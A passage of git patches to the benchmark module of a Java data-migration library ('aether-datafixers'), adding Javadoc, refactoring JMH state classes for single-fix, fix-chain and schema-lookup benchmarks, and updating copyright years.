+ public static class PlayerState {
+
+ /**
+ * DataFixer configured with a player-specific transformation fix. Performs codec decode → transform → encode
+ * cycle.
+ */
+ public DataFixer playerFixer;
+
+ /**
+ * Pre-generated player data structure with realistic game entity fields.
+ */
+ public Dynamic playerInput;
+
+ /**
+ * Source version for migrations (v1).
+ */
+ public DataVersion fromVersion;
+
+ /**
+ * Target version for migrations (v2).
+ */
+ public DataVersion toVersion;
+
+ /**
+ * Initializes the player benchmark state once per trial.
+ *
+ *
Creates the player fixer and generates realistic player test data.
+ */
+ @Setup(Level.Trial)
+ public void setup() {
+ this.playerFixer = BenchmarkBootstrap.createPlayerFixer();
+ this.playerInput = BenchmarkDataGenerator.generatePlayerData(GsonOps.INSTANCE);
+ this.fromVersion = new DataVersion(1);
+ this.toVersion = new DataVersion(2);
+ }
}
}
From ccb0fb9c9516258e559782dbc52035f52481e31e Mon Sep 17 00:00:00 2001
From: Erik
Date: Tue, 20 Jan 2026 21:08:37 +0100
Subject: [PATCH 07/39] Remove expected performance notes from
`SingleFixBenchmark` Javadoc for cleaner documentation.
---
.../datafixers/benchmarks/core/SingleFixBenchmark.java | 10 ++--------
1 file changed, 2 insertions(+), 8 deletions(-)
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
index 71dbef4..2ff7c49 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
@@ -110,8 +110,6 @@ public class SingleFixBenchmark {
* This represents a common, lightweight migration operation. The benchmark is parameterized by {@link PayloadSize}
* to measure scaling behavior.
*
- *
- *
* @param s the shared benchmark state containing fixer and input data
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@@ -131,8 +129,6 @@ public void singleRenameFix(final SizedState s, final Blackhole blackhole) {
* Use this as a baseline to calculate the true cost of transformations by subtracting identity time from other
* benchmark results.
*
- *
- *
* @param s the shared benchmark state containing identity fixer and input data
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@@ -152,10 +148,8 @@ public void identityFix(final SizedState s, final Blackhole blackhole) {
* is decoded via codec, transformed, and re-encoded. This represents the upper bound of migration cost for complex
* object transformations.
*
- *
Expected performance: ~17-18 μs/op (significantly slower due to codec overhead)
- *
- *
The ~70x slowdown compared to {@link #singleRenameFix} is expected and
- * acceptable, as codec roundtrips involve reflection, object instantiation, and full serialization/deserialization
+ *
This benchmark is expected to be significantly slower than {@link #singleRenameFix}
+ * because codec roundtrips involve reflection, object instantiation, and full serialization/deserialization
* cycles.
Measures the performance of applying multiple sequential fixes,
- * simulating real-world migration scenarios where data may need to
- * traverse many version upgrades.
+ *
Measures how fix chain length affects migration performance. This benchmark
+ * is essential for understanding the scalability characteristics of the DataFixer
+ * system when applying multiple sequential fixes.
+ *
+ *
Benchmark Methods
+ *
+ *
{@link #renameChain} - Chain of homogeneous field rename operations
+ *
{@link #mixedChain} - Chain of heterogeneous operations (renames, additions, transformations)
+ *
{@link #partialChain} - Partial chain execution stopping at halfway version
+ *
+ *
+ *
Parameters
+ *
+ *
Parameter
Values
Description
+ *
fixCount
1, 5, 10, 25, 50
Number of fixes in the chain
+ *
payloadSize
SMALL, MEDIUM
Input data complexity
+ *
+ *
+ *
Benchmark Configuration
+ *
+ *
Setting
Value
+ *
Warmup
5 iterations, 1 second each
+ *
Measurement
10 iterations, 1 second each
+ *
Forks
2 (for statistical significance)
+ *
JVM Heap
2 GB min/max
+ *
Time Unit
Microseconds
+ *
+ *
+ *
Interpreting Results
+ *
+ *
Linear scaling: Ideal behavior where time scales proportionally with fix count.
+ *
Sub-linear scaling: Better than expected, indicates optimization opportunities being exploited.
+ *
Super-linear scaling: Indicates potential performance issues with long chains.
+ *
Error (±): 99.9% confidence interval. Larger values with more fixes may indicate GC pressure.
+ *
+ *
+ *
Usage
+ *
{@code
+ * # Run only this benchmark
+ * java -jar benchmarks.jar MultiFixChainBenchmark
+ *
+ * # Quick test with reduced iterations
+ * java -jar benchmarks.jar MultiFixChainBenchmark -wi 1 -i 1 -f 1
+ *
+ * # Specific fix count and payload size
+ * java -jar benchmarks.jar MultiFixChainBenchmark -p fixCount=10 -p payloadSize=SMALL
+ *
+ * # Generate CSV output for analysis
+ * java -jar benchmarks.jar MultiFixChainBenchmark -rf csv -rff chain_results.csv
+ * }
*
* @author Erik Pförtner
+ * @see SingleFixBenchmark
+ * @see BenchmarkBootstrap#createChainFixer(int)
+ * @see BenchmarkBootstrap#createMixedFixer(int)
* @since 1.0.0
*/
@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
@@ -64,34 +114,130 @@
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
public class MultiFixChainBenchmark {
+ /**
+ * The number of fixes in the chain, injected by JMH.
+ *
+ *
This parameter controls the length of the fix chain being benchmarked.
+ * Higher values test the system's ability to handle long migration paths
+ * efficiently.
+ *
+ *
+ *
1: Baseline single-fix performance (compare with {@link SingleFixBenchmark})
+ *
5: Short chain typical of minor version updates
+ *
10: Medium chain representing moderate version gaps
+ *
25: Long chain simulating significant version jumps
+ *
50: Stress test for extended migration paths
+ *
+ */
@Param({"1", "5", "10", "25", "50"})
private int fixCount;
+ /**
+ * The payload size parameter, injected by JMH.
+ *
+ *
Controls the complexity of generated test data. Only SMALL and MEDIUM
+ * sizes are used to keep benchmark runtime reasonable while still capturing
+ * scaling behavior.
+ *
+ * @see PayloadSize
+ */
@Param({"SMALL", "MEDIUM"})
private PayloadSize payloadSize;
+ /**
+ * DataFixer configured with a chain of homogeneous field rename fixes.
+ *
+ *
Each fix in the chain performs a simple field rename operation (v{@code n} → v{@code n+1}).
+ * This represents the best-case scenario for chain execution.
+ */
private DataFixer chainFixer;
+
+ /**
+ * DataFixer configured with a chain of heterogeneous fix operations.
+ *
+ *
The chain includes a mix of rename, add, and transform operations to
+ * simulate realistic migration scenarios. Falls back to {@link #chainFixer}
+ * if mixed fixer creation fails.
Regenerated at each iteration to ensure consistent GC behavior
+ * and avoid caching effects.
+ */
private Dynamic input;
+
+ /**
+ * Source version for migrations (always v1).
+ */
private DataVersion fromVersion;
+
+ /**
+ * Target version for full chain migrations (v{@link #fixCount} + 1).
+ */
private DataVersion toVersion;
+ /**
+ * Target version for partial chain migrations (approximately half of {@link #toVersion}).
+ *
+ *
Used by {@link #partialChain} to measure performance when only part
+ * of the available fixes are applied.
+ */
+ private DataVersion halfwayToVersion;
+
+ /**
+ * Initializes the benchmark state once per trial.
+ *
+ *
Creates the chain and mixed fixers based on the current {@link #fixCount}
+ * parameter. Also calculates the version bounds for full and partial chain
+ * execution.
+ *
+ *
If mixed fixer creation fails (e.g., due to unsupported operations),
+ * the chain fixer is used as a fallback to ensure the benchmark can still run.
+ */
@Setup(Level.Trial)
- public void setup() {
+ public void setupTrial() {
this.chainFixer = BenchmarkBootstrap.createChainFixer(this.fixCount);
- if (this.fixCount >= 4) {
+
+ try {
this.mixedFixer = BenchmarkBootstrap.createMixedFixer(this.fixCount);
+ } catch (final RuntimeException ex) {
+ this.mixedFixer = this.chainFixer;
}
- this.input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, this.payloadSize);
+
this.fromVersion = new DataVersion(1);
this.toVersion = new DataVersion(this.fixCount + 1);
+
+ final int halfwayVersion = Math.max(2, (this.fixCount / 2) + 1);
+ this.halfwayToVersion = new DataVersion(halfwayVersion);
+ }
+
+ /**
+ * Regenerates input data at each iteration.
+ *
+ *
Fresh data generation per iteration ensures that:
+ *
+ *
GC behavior is consistent across iterations
+ *
JIT optimizations don't over-specialize on specific data patterns
+ *
Memory allocation patterns are representative of real usage
+ *
+ */
+ @Setup(Level.Iteration)
+ public void setupIteration() {
+ this.input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, this.payloadSize);
}
/**
- * Benchmarks applying a chain of rename fixes.
+ * Benchmarks a chain of homogeneous field rename operations.
*
- *
All fixes in the chain perform the same operation type (rename),
- * measuring sequential fix application overhead.
+ *
Measures the performance of applying {@link #fixCount} sequential rename
+ * fixes to migrate data from v1 to v{@code fixCount+1}. This represents an
+ * optimistic scenario where all fixes perform the same lightweight operation.
+ *
+ *
Use this benchmark to establish baseline chain performance and detect
+ * any non-linear scaling behavior in the fix application pipeline.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@@ -106,20 +252,24 @@ public void renameChain(final Blackhole blackhole) {
}
/**
- * Benchmarks applying a chain of mixed fix types.
+ * Benchmarks a chain of heterogeneous fix operations.
+ *
+ *
Measures the performance of applying {@link #fixCount} sequential fixes
+ * that include a mix of operations:
+ *
+ *
Field renames
+ *
Field additions with default values
+ *
Field transformations (type conversions, value mappings)
+ *
*
- *
Includes rename, add, remove, and transform operations
- * for more realistic migration scenarios.
+ *
This benchmark provides a more realistic performance profile compared
+ * to {@link #renameChain}, as real-world migrations typically involve
+ * diverse operations.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void mixedChain(final Blackhole blackhole) {
- if (this.mixedFixer == null) {
- // Skip for fixCount < 4
- blackhole.consume(this.input);
- return;
- }
final Dynamic result = this.mixedFixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
this.input,
@@ -129,21 +279,29 @@ public void mixedChain(final Blackhole blackhole) {
}
/**
- * Benchmarks partial migration (half the chain).
+ * Benchmarks partial chain execution stopping at halfway version.
+ *
+ *
Measures the performance of applying only half of the available fixes
+ * in the chain. This simulates scenarios where:
+ *
+ *
Data is migrated incrementally rather than to the latest version
+ *
Target version is not the most recent available
+ *
Partial upgrades are performed for compatibility reasons
+ *
*
- *
Measures performance when migrating to an intermediate version
- * rather than the latest version.
+ *
Comparing this benchmark with {@link #renameChain} reveals whether
+ * fix selection and version range calculations add significant overhead.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void partialChain(final Blackhole blackhole) {
- final int halfwayVersion = Math.max(2, (this.fixCount / 2) + 1);
final Dynamic result = this.chainFixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
this.input,
this.fromVersion,
- new DataVersion(halfwayVersion));
+ this.halfwayToVersion
+ );
blackhole.consume(result);
}
}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
index d895b69..a8dbb42 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
@@ -41,17 +41,66 @@
import org.openjdk.jmh.annotations.Warmup;
import org.openjdk.jmh.infra.Blackhole;
-import java.util.Random;
+import java.util.SplittableRandom;
import java.util.concurrent.TimeUnit;
/**
* JMH benchmark for schema registry lookup performance.
*
- *
Measures the performance of {@link SchemaRegistry#get(DataVersion)}
- * with varying registry sizes. Uses floor semantics (finds greatest version
- * less than or equal to requested).
+ *
Measures the overhead of various schema lookup operations as registry size grows.
+ * Schema lookups are performed frequently during data migration, so their performance directly impacts overall
+ * migration throughput.
+ *
+ *
Benchmark Methods
+ *
+ *
{@link #exactLookup} - Direct lookup by exact version match
+ *
{@link #floorLookup} - Floor lookup finding closest version ≤ target
+ *
{@link #latestLookup} - Retrieval of the most recent schema
+ *
{@link #sequentialLookup} - Sequential traversal of all registered versions
+ *
+ *
+ *
Parameters
+ *
+ *
Parameter
Values
Description
+ *
schemaCount
10, 50, 100, 500
Number of schemas in the registry
+ *
+ *
+ *
Benchmark Configuration
+ *
+ *
Setting
Value
+ *
Warmup
5 iterations, 1 second each
+ *
Measurement
10 iterations, 1 second each
+ *
Forks
2 (for statistical significance)
+ *
JVM Heap
2 GB min/max
+ *
Time Unit
Nanoseconds
+ *
+ *
+ *
Interpreting Results
+ *
+ *
O(1) lookups: {@link #exactLookup} and {@link #latestLookup} should show constant time regardless of registry size.
+ *
O(log n) lookups: {@link #floorLookup} may show logarithmic scaling if implemented via binary search.
+ *
O(n) lookups: {@link #sequentialLookup} should scale linearly with schema count.
+ *
Cache effects: Larger registries may show increased lookup time due to CPU cache pressure.
+ *
+ *
+ *
Usage
+ *
{@code
+ * # Run only this benchmark
+ * java -jar benchmarks.jar SchemaLookupBenchmark
+ *
+ * # Quick test with reduced iterations
+ * java -jar benchmarks.jar SchemaLookupBenchmark -wi 1 -i 1 -f 1
+ *
+ * # Specific schema count only
+ * java -jar benchmarks.jar SchemaLookupBenchmark -p schemaCount=100
+ *
+ * # Run specific lookup benchmark
+ * java -jar benchmarks.jar SchemaLookupBenchmark.exactLookup
+ * }
*
* @author Erik Pförtner
+ * @see SchemaRegistry
+ * @see SimpleSchemaRegistry
* @since 1.0.0
*/
@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
@@ -62,87 +111,274 @@
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
public class SchemaLookupBenchmark {
- @Param({"10", "50", "100", "500"})
- private int schemaCount;
-
- private SchemaRegistry registry;
- private DataVersion[] versions;
- private DataVersion[] lookupVersions;
- private Random random;
-
- @Setup(Level.Trial)
- public void setup() {
- // Create registry with specified number of schemas
- final SimpleSchemaRegistry simpleRegistry = new SimpleSchemaRegistry();
- this.versions = new DataVersion[this.schemaCount];
-
- for (int i = 0; i < this.schemaCount; i++) {
- final int version = (i + 1) * 10; // 10, 20, 30, ...
- this.versions[i] = new DataVersion(version);
- simpleRegistry.register(MockSchemas.minimal(version));
- }
- simpleRegistry.freeze();
- this.registry = simpleRegistry;
-
- // Create lookup versions (including versions between registered versions)
- this.lookupVersions = new DataVersion[this.schemaCount * 2];
- for (int i = 0; i < this.lookupVersions.length; i++) {
- this.lookupVersions[i] = new DataVersion((i + 1) * 5); // 5, 10, 15, ...
- }
-
- this.random = new Random(42); // Fixed seed for reproducibility
- }
-
/**
- * Benchmarks looking up an exact registered version.
+ * Benchmarks exact version lookup performance.
+ *
+ *
Measures the time to retrieve a schema by its exact registered version.
+ * This is the most common lookup pattern during migration when the source version is known precisely.
+ *
+ *
The benchmark uses pre-generated random indices to avoid RNG overhead
+ * in the measurement loop. Each invocation looks up a different random version to prevent branch prediction
+ * optimization.
*
+ * @param s the shared benchmark state containing the registry and versions
+ * @param t the per-thread state providing random lookup indices
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void exactLookup(final Blackhole blackhole) {
- final int index = this.random.nextInt(this.schemaCount);
- final Schema schema = this.registry.get(this.versions[index]);
+ public void exactLookup(final BenchmarkState s,
+ final ThreadState t,
+ final Blackhole blackhole) {
+ final int index = t.nextExactIndex();
+ final Schema schema = s.registry.get(s.versions[index]);
blackhole.consume(schema);
}
/**
- * Benchmarks looking up a version using floor semantics.
+ * Benchmarks floor lookup performance.
*
- *
Half of the lookups will be for exact versions, half will
- * require floor resolution.
+ *
Measures the time to retrieve a schema using floor semantics, where
+ * the registry returns the schema with the highest version ≤ the requested version. This pattern is used when
+ * data may be at intermediate versions not explicitly registered.
*
+ *
The lookup versions include both exact matches (10, 20, 30, ...) and
+ * in-between values (5, 15, 25, ...) to exercise both fast-path exact matches and slower floor searches.
+ *
+ * @param s the shared benchmark state containing the registry and lookup versions
+ * @param t the per-thread state providing random lookup indices
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void floorLookup(final Blackhole blackhole) {
- final int index = this.random.nextInt(this.lookupVersions.length);
- final Schema schema = this.registry.get(this.lookupVersions[index]);
+ public void floorLookup(final BenchmarkState s,
+ final ThreadState t,
+ final Blackhole blackhole) {
+ final int index = t.nextFloorIndex();
+ final Schema schema = s.registry.get(s.lookupVersions[index]);
blackhole.consume(schema);
}
/**
- * Benchmarks getting the latest schema.
+ * Benchmarks latest schema retrieval performance.
+ *
+ *
Measures the time to retrieve the most recent schema from the registry.
+ * This operation should be O(1) as the latest schema is typically cached or stored in a dedicated field.
*
+ *
This benchmark serves as a baseline for the fastest possible lookup
+ * operation and helps identify any unexpected overhead in the registry implementation.
+ *
+ * @param s the shared benchmark state containing the registry
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void latestLookup(final Blackhole blackhole) {
- final Schema schema = this.registry.latest();
+ public void latestLookup(final BenchmarkState s,
+ final Blackhole blackhole) {
+ final Schema schema = s.registry.latest();
blackhole.consume(schema);
}
/**
- * Benchmarks sequential lookup of all versions.
+ * Benchmarks sequential lookup of all registered schemas.
+ *
+ *
Measures the aggregate time to look up every schema in the registry
+ * in version order. This pattern occurs during schema validation, debugging, or when building migration path
+ * analyses.
*
- *
Measures cache-friendly access patterns.
+ *
Note: This benchmark performs multiple lookups per invocation
+ * ({@code schemaCount} lookups). The reported time is for the entire sequence, not per-lookup. Divide by
+ * {@code schemaCount} to get per-lookup overhead.
*
+ * @param s the shared benchmark state containing the registry and versions
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void sequentialLookup(final Blackhole blackhole) {
- for (final DataVersion version : this.versions) {
- final Schema schema = this.registry.get(version);
+ public void sequentialLookup(final BenchmarkState s,
+ final Blackhole blackhole) {
+ for (final DataVersion version : s.versions) {
+ final Schema schema = s.registry.get(version);
blackhole.consume(schema);
}
}
+
+ /**
+ * Shared JMH state containing the schema registry and version arrays.
+ *
+ *
This state is shared across all threads within a benchmark trial
+ * ({@link Scope#Benchmark}). The registry is populated with mock schemas at versions 10, 20, 30, ... up to
+ * {@code schemaCount * 10}.
+ *
+ *
The registry is frozen after setup to match production usage patterns
+ * where registries are immutable during normal operation.
+ */
+ @State(Scope.Benchmark)
+ public static class BenchmarkState {
+
+ /**
+ * The number of schemas to register, injected by JMH.
+ *
+ *
Controls the size of the schema registry to measure lookup
+ * performance scaling:
+ *
+ *
10: Small registry, fits entirely in L1 cache
+ *
50: Medium registry, typical for most applications
+ *
100: Large registry, may exceed L1 cache
+ *
500: Stress test for registry scalability
+ *
+ */
+ @Param({"10", "50", "100", "500"})
+ public int schemaCount;
+
+ /**
+ * The frozen schema registry containing all registered schemas.
+ */
+ public SchemaRegistry registry;
+
+ /**
+ * Array of exact registered versions (10, 20, 30, ...).
+ *
+ *
Used by {@link #exactLookup} to ensure lookups always hit
+ * registered versions.
+ */
+ public DataVersion[] versions;
+
+ /**
+ * Array of lookup versions including in-between values (5, 10, 15, 20, ...).
+ *
+ *
Used by {@link #floorLookup} to exercise both exact matches
+ * and floor search behavior.
+ */
+ public DataVersion[] lookupVersions;
+
+ /**
+ * Initializes the schema registry and version arrays once per trial.
+ *
+ *
Creates a {@link SimpleSchemaRegistry} populated with minimal mock
+ * schemas at regular version intervals. The registry is frozen after population to enable any internal
+ * optimizations.
+ */
+ @Setup(Level.Trial)
+ public void setup() {
+ final SimpleSchemaRegistry simpleRegistry = new SimpleSchemaRegistry();
+ this.versions = new DataVersion[this.schemaCount];
+
+ for (int i = 0; i < this.schemaCount; i++) {
+ final int version = (i + 1) * 10;
+ final DataVersion dataVersion = new DataVersion(version);
+ this.versions[i] = dataVersion;
+ simpleRegistry.register(MockSchemas.minimal(version));
+ }
+
+ simpleRegistry.freeze();
+ this.registry = simpleRegistry;
+
+ this.lookupVersions = new DataVersion[this.schemaCount * 2];
+ for (int i = 0; i < this.lookupVersions.length; i++) {
+ this.lookupVersions[i] = new DataVersion((i + 1) * 5);
+ }
+ }
+ }
+
+ /**
+ * Per-thread JMH state providing pre-generated random lookup indices.
+ *
+ *
Random number generation is expensive and would dominate the benchmark
+ * if performed in the hot path. This state pre-generates buffers of random indices during setup, allowing the
+ * benchmark methods to retrieve indices via simple array access and bit masking.
+ *
+ *
Each thread has its own state instance ({@link Scope#Thread}) to avoid
+ * contention on shared RNG state. The fixed seed ensures reproducible results across benchmark runs.
+ *
+ * @see BenchmarkState
+ */
+ @State(Scope.Thread)
+ public static class ThreadState {
+
+ /**
+ * Size of the pre-generated index buffer.
+ *
+ *
Power-of-two size enables cheap index wrapping via bit masking
+ * instead of modulo operation.
+ */
+ private static final int INDEX_BUFFER_SIZE = 1024;
+
+ /**
+ * Bit mask for wrapping cursor to buffer bounds ({@code INDEX_BUFFER_SIZE - 1}).
+ */
+ private static final int INDEX_MASK = INDEX_BUFFER_SIZE - 1;
+
+ /**
+ * Pre-generated indices into {@link BenchmarkState#versions}.
+ */
+ private final int[] exactIndices = new int[INDEX_BUFFER_SIZE];
+
+ /**
+ * Pre-generated indices into {@link BenchmarkState#lookupVersions}.
+ */
+ private final int[] floorIndices = new int[INDEX_BUFFER_SIZE];
+
+ /**
+ * Current position in {@link #exactIndices}.
+ */
+ private int exactCursor;
+
+ /**
+ * Current position in {@link #floorIndices}.
+ */
+ private int floorCursor;
+
+ /**
+ * Thread-local random number generator for index generation.
+ */
+ private SplittableRandom random;
+
+ /**
+ * Initializes the random number generator once per trial.
+ *
+ *
Uses a fixed seed (42) for reproducibility. Each thread gets its
+ * own {@link SplittableRandom} instance to avoid synchronization overhead.
+ */
+ @Setup(Level.Trial)
+ public void setupTrial() {
+ this.random = new SplittableRandom(42L);
+ }
+
+ /**
+ * Refills the index buffers at each iteration.
+ *
+ *
Generates fresh random indices based on the current
+ * {@link BenchmarkState#schemaCount} parameter. Resets cursors to the beginning of each buffer.
+ *
+ * @param s the shared benchmark state providing array bounds
+ */
+ @Setup(Level.Iteration)
+ public void setupIteration(final BenchmarkState s) {
+ for (int i = 0; i < INDEX_BUFFER_SIZE; i++) {
+ this.exactIndices[i] = this.random.nextInt(s.versions.length);
+ this.floorIndices[i] = this.random.nextInt(s.lookupVersions.length);
+ }
+ this.exactCursor = 0;
+ this.floorCursor = 0;
+ }
+
+ /**
+ * Returns the next random index for exact version lookup.
+ *
+ *
Uses bit masking to wrap around the buffer efficiently.
+ *
+ * @return a random index into {@link BenchmarkState#versions}
+ */
+ public int nextExactIndex() {
+ return this.exactIndices[this.exactCursor++ & INDEX_MASK];
+ }
+
+ /**
+ * Returns the next random index for floor version lookup.
+ *
+ *
Uses bit masking to wrap around the buffer efficiently.
+ *
+ * @return a random index into {@link BenchmarkState#lookupVersions}
+ */
+ public int nextFloorIndex() {
+ return this.floorIndices[this.floorCursor++ & INDEX_MASK];
+ }
+ }
}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/package-info.java
new file mode 100644
index 0000000..08423be
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/package-info.java
@@ -0,0 +1,90 @@
+/*
+ * Copyright (c) 2025 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+/**
+ * Core JMH benchmarks for the Aether DataFixers framework.
+ *
+ *
This package contains benchmarks that measure the fundamental performance characteristics
+ * of the data fixer system, including fix application, chain execution, and schema registry
+ * operations. These benchmarks form the foundation for performance regression testing and
+ * optimization efforts.
Isolation: Each benchmark measures a single operation to isolate performance characteristics.
+ *
Parameterization: Benchmarks are parameterized to capture scaling behavior across different input sizes.
+ *
Reproducibility: Fixed seeds and deterministic data generation ensure reproducible results.
+ *
JMH Best Practices: All benchmarks follow JMH guidelines including proper use of {@code Blackhole},
+ * state scoping, and setup level annotations.
+ *
+ *
+ *
Interpreting Results
+ *
All benchmarks in this package report both throughput (ops/time) and average time (time/op).
+ * When comparing results:
+ *
+ *
Compare measurements from the same JVM version and hardware
+ *
Consider the 99.9% confidence interval (error bounds)
+ *
Run multiple forks to account for JIT compilation variance
+ *
Use baseline benchmarks (e.g., identity fix) to isolate framework overhead
+ *
+ *
+ * @see de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap
+ * @see de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator
+ * @since 1.0.0
+ */
+package de.splatgames.aether.datafixers.benchmarks.core;
From 58d5f6c06618b2062dbf3e11254e0031a714d486 Mon Sep 17 00:00:00 2001
From: Erik
Date: Mon, 26 Jan 2026 22:17:47 +0100
Subject: [PATCH 21/39] Update copyright year to 2026 in benchmark files
---
.../aether/datafixers/benchmarks/BenchmarkRunner.java | 2 +-
.../datafixers/benchmarks/codec/CollectionCodecBenchmark.java | 2 +-
.../datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java | 3 +--
.../benchmarks/concurrent/ConcurrentMigrationBenchmark.java | 2 +-
.../datafixers/benchmarks/core/MultiFixChainBenchmark.java | 2 +-
.../datafixers/benchmarks/core/SchemaLookupBenchmark.java | 2 +-
.../aether/datafixers/benchmarks/core/SingleFixBenchmark.java | 2 +-
.../aether/datafixers/benchmarks/core/package-info.java | 2 +-
.../datafixers/benchmarks/format/CrossFormatBenchmark.java | 2 +-
.../aether/datafixers/benchmarks/format/JsonBenchmark.java | 2 +-
.../aether/datafixers/benchmarks/format/TomlXmlBenchmark.java | 2 +-
.../aether/datafixers/benchmarks/format/YamlBenchmark.java | 2 +-
.../aether/datafixers/benchmarks/util/BenchmarkBootstrap.java | 2 +-
.../datafixers/benchmarks/util/BenchmarkDataGenerator.java | 2 +-
.../aether/datafixers/benchmarks/util/PayloadSize.java | 2 +-
15 files changed, 15 insertions(+), 16 deletions(-)
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java
index 4467845..d8f91e8 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/BenchmarkRunner.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
index 2167a2d..a55b729 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
index 82b3d04..ad44bd4 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (c) 2025 Splatgames.de Software and Contributors
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
@@ -23,7 +23,6 @@
package de.splatgames.aether.datafixers.benchmarks.codec;
import com.google.gson.JsonElement;
-import de.splatgames.aether.datafixers.api.codec.Codec;
import de.splatgames.aether.datafixers.api.codec.Codecs;
import de.splatgames.aether.datafixers.api.result.DataResult;
import de.splatgames.aether.datafixers.api.util.Pair;
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
index f402cf8..3afb77f 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
